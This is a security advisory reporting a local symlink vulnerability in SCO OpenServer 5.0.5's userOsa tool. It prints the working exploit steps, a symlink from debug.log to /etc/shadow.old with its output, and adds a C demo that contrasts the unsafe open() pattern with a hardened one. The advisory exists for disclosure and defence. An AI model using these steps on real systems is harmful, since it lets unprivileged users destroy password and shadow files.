COMMAND

    /etc/sysadm.d/bin/userOsa

SYSTEMS AFFECTED

    SCO OpenServer 5.0.5

PROBLEM

    Brock Tellier found the following.  Any user may overwrite any file
    writable by group auth (e.g. /etc/shadow, /etc/passwd) using
    /etc/sysadm.d/bin/userOsa.  Note that this will not change the
    permissions of the file or allow the user to insert a passwd entry
    string into these files; it will simply clobber the contents of the
    file with debug output.

    When userOsa receives invalid input, it generates a log file called
    "debug.log" in the current working directory.  The file is created
    with group auth permissions, userOsa does not check whether the file
    already exists, and the open follows symlinks.  Thus the exploit is
    as follows:

        scohack:/tmp$ ln -s /etc/shadow.old debug.log
        scohack:/tmp$ /etc/sysadm.d/bin/userOsa
        bah
        connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}
        Failed to listen to client
        Failure in making connection to OSA.
        scohack:/tmp$

    BEFORE EXPLOIT:

        scohack:/# l /etc/shadow.old
        -rw-rw----   1 root     auth          26 Oct 11 20:08 /etc/shadow.old

    AFTER EXPLOIT (note the file size):

        scohack:/# l /etc/shadow.old
        -rw-rw----   1 root     auth         177 Oct 11 20:10 /etc/shadow.old

        scohack:/# cat /etc/shadow.old
        >>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604>
        <<<
        SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ
        {Invalid Connect Request: bah}}})

        scohack:/#
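    As an added illustration (not code from the advisory or from SCO), the
    following C reproduces the failure mode in a private temp directory: the
    open(2) pattern that follows a symlink and truncates its target, next to
    the O_EXCL/O_NOFOLLOW form that refuses it.  The temp path and the
    stand-in target contents are constructed for the demo.

```c
#define _XOPEN_SOURCE 700
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
/* Vulnerable pattern (reconstructed from the advisory, not SCO's code): O_CREAT
 * without O_EXCL follows an existing symlink at `path` and truncates its target. */
int open_debug_log_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0660);
}

/* Hardened pattern: O_EXCL makes open() fail if anything already exists at
 * `path`, a symlink included; O_NOFOLLOW additionally rejects symlinks. */
int open_debug_log_safe(const char *path) {
    int flags = O_WRONLY | O_CREAT | O_EXCL;
#ifdef O_NOFOLLOW
    flags |= O_NOFOLLOW;
#endif
    return open(path, flags, 0600);
}

/* Stages the advisory's layout in a private temp dir: a stand-in for
 * /etc/shadow.old with content, and debug.log as a symlink to it. Returns 1
 * if the safe opener refused the symlink and the unsafe one truncated the target. */
int demo_symlink_clobber(void) {
    char dir[] = "/tmp/userosa-demo-XXXXXX";      /* constructed demo path */
    char target[256], lnk[256];
    struct stat st;
    int fd, result = 0;
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(target, sizeof target, "%s/shadow.old", dir);
    snprintf(lnk, sizeof lnk, "%s/debug.log", dir);
    fd = open(target, O_WRONLY | O_CREAT, 0600);
    if (fd < 0) goto cleanup;
    if (write(fd, "root:x:0:0\n", 11) != 11) { close(fd); goto cleanup; }
    close(fd);
    if (symlink(target, lnk) != 0) goto cleanup;
    if (open_debug_log_safe(lnk) == -1 && (errno == EEXIST || errno == ELOOP)) {
        fd = open_debug_log_unsafe(lnk);           /* what userOsa effectively does */
        if (fd >= 0) close(fd);
        if (stat(target, &st) == 0 && st.st_size == 0) result = 1;   /* clobbered */
    }
cleanup:
    unlink(lnk); unlink(target); rmdir(dir);
    return result;
}
```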

SOLUTION

    Nothing yet.